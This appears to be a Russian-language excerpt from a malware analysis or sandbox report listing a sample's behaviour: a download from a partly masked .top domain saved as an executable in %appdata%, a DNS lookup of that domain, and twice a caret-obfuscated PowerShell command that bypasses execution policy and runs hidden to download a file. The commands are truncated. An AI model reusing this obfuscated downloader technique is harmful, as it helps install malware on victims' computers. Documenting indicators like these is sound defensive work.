Техническая информация
- http://ne###argoka.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^Wer^SHelL^.^EX^e -^Exec^uT^I^O^NP^o^Li^C^y Byp^AsS ^-nOP^rO^fIL^E -w^inDO^wstY^L^E^ HiDDEn ^(^NEw-^OB^j^EC^t s^YsTem.NET.^wE^bC^l^Ien^t)^.D^oWnlOAD^FILE('http://ne###argoka...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "po^Wer^SHelL^.^EX^e -^Exec^uT^I^O^NP^o^Li^C^y Byp^AsS ^-nOP^rO^fIL^E -w^inDO^wstY^L^E^ HiDDEn ^(^NEw-^OB^j^EC^t s^YsTem.NET.^wE^bC^l^Ien^t)^.D^oWnlOAD^FILE('http://ne###argoka...' (со скрытым окном)